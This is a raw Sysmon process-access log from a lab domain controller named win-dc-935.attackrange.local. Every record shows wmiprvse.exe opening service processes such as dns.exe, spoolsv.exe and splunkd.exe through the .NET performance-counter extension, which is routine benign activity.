13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 